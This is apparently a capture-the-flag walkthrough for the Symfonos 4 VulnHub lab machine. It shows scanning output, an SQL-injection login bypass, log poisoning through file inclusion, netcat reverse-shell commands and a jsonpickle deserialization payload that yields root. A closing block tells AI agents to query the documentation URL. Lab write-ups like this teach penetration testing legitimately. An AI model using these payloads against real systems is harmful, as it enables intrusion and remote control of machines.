# Symfonos 4
## Enumeration
### nmap
```
nmap -sC -sV oA nmap/sym4 192.168.1.136
```
```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 23:43 EDT
Nmap scan report for 192.168.1.136
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 f9:c1:73:95:a4:17:df:f6:ed:5c:8e:8a:c8:05:f9:8f (RSA)
| 256 be:c1:fd:f1:33:64:39:9a:68:35:64:f9:bd:27:ec:01 (ECDSA)
|_ 256 66:f7:6a:e8:ed:d5:1d:2d:36:32:64:39:38:4f:9c:8a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:DA:3F:AA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.27 seconds
```
As usual port 80 is open and we can put our IP at the web browser
Let's put to dirb
### Dirb
```
dirb http://192.168.1.136
```
```
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed May 27 00:05:13 2020
URL_BASE: http://192.168.1.136/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.136/ ----
==> DIRECTORY: http://192.168.1.136/css/
+ http://192.168.1.136/index.html (CODE:200|SIZE:201)
==> DIRECTORY: http://192.168.1.136/javascript/
==> DIRECTORY: http://192.168.1.136/js/
==> DIRECTORY: http://192.168.1.136/manual/
+ http://192.168.1.136/robots.txt (CODE:403|SIZE:298)
+ http://192.168.1.136/server-status (CODE:403|SIZE:301)
```
We can see there is a /`robots.txt`
We don't have permission to access this file, so I use `nikto` to enumerate
### Nikto
```
nikto -h http://192.168.1.136
```
```
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.136
+ Target Hostname: 192.168.1.136
+ Target Port: 80
+ Start Time: 2020-05-27 00:17:10 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ Entry '/atlantis.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Server may leak inodes via ETags, header found with file /, inode: c9, size: 59058b74c9871, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2020-05-27 00:18:10 (GMT-4) (60 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
We can see that there is `/atlantis.php` inside the robots.txt
Saw a login form, all I can think of is SQL injection.
After some tries, I can bypass the login form using this command at the username form
```
admin' or '1'='1'#
```
I can't seem to find anything. I even tried the LFI to `../../../../../../etc/passwd` but does not work. So I went to more enumeration.
### Gobuster
```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.1.136 -x php
```
```
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.136
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/05/27 00:36:55 Starting gobuster
===============================================================
/css (Status: 301)
/manual (Status: 301)
/js (Status: 301)
/javascript (Status: 301)
/sea.php (Status: 302)
/atlantis.php (Status: 200)
/server-status (Status: 403)
/gods (Status: 301)
===============================================================
2020/05/27 00:41:53 Finished
===============================================================
```
Ah, we can see that there is a `/gods`
This is where the log file is stored. But then I realize this is the log file, then it seems like we can do ../../../../../../var/log/auth.
But if we do in the proper way, things will be like this
## Exploitation
### Wfuzz
We will use Wfuzz.
First, we need to use burp to intercept to get the **PHPSESSID**
Then, I use
```
wfuzz -c -b 'PHPSESSID=6mlbncfhcq8vhshrb4iqc5ev1r' -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt http://192.168.1.106/sea.php?file=FUZZ
```
But first I didn't get the thing I wanted, soon, I check the wordlists and surprisingly the file does not include `../../../../../../../var/log/auth`.
So I add in myself, then we can run the command again
We need to hide the word that have the length of 39
```
wfuzz -c -b 'PHPSESSID=6mlbncfhcq8vhshrb4iqc5ev1r' -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hw 39 http://192.168.1.106/sea.php?file=FUZZ
```
Run it again then we got this
We can see the log file now, then we can actually poison the LFI
```
ssh ''@192.168.1.106
```
Then we can go to end of the URL and add `&c=id;whoami;`
We can now get the reverse shell from it
Our machine
```
nc -nlvp 4444
```
At the end of the URL
```
c=nc -e /bin/bash 192.168.1.116 4444
```
We got a shell !
Then we can type
```
python -c 'import pty; pty.spawn("/bin/bash")'
```
After some digging we can use
```
ss -l
```
to get what port is running on the machine
As we can see there is another port that is running.
### Port Forward
We can port forward the port to get access it, since this only can locally port forward so we need to use `socat`.
```
socat TCP-LISTEN:8888,fork,reuseaddr TCP:127.0.0.1:8080 &
```
Then we can access it with port 8888
Then click the `Main page`
Since it mentioned about cookie, let's check for cookie
We can decode the password with this [website](https://www.base64decode.org/) and we got this
After some researching, it is a jsonpickle exploit. We can read these 3 website
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
to get an idea how it works
The code looks like this
```
{"py/reduce": "__main__.Shell", "py/reduce": [{"py/function": "os.system"},["nc -e /bin/bash 192.168.1.116 9000"],0,0,0]}
```
Then we can encode using base64 and put it at the cookies and get a reverse shell
Remember to set up a listener at our machine first
And then refresh the page, we got root !
Navigate to `/root` and get the `flag.txt`
Congratulation!
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://choochisiang.gitbook.io/report/vulnhub/symfonos/symfonos-4.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.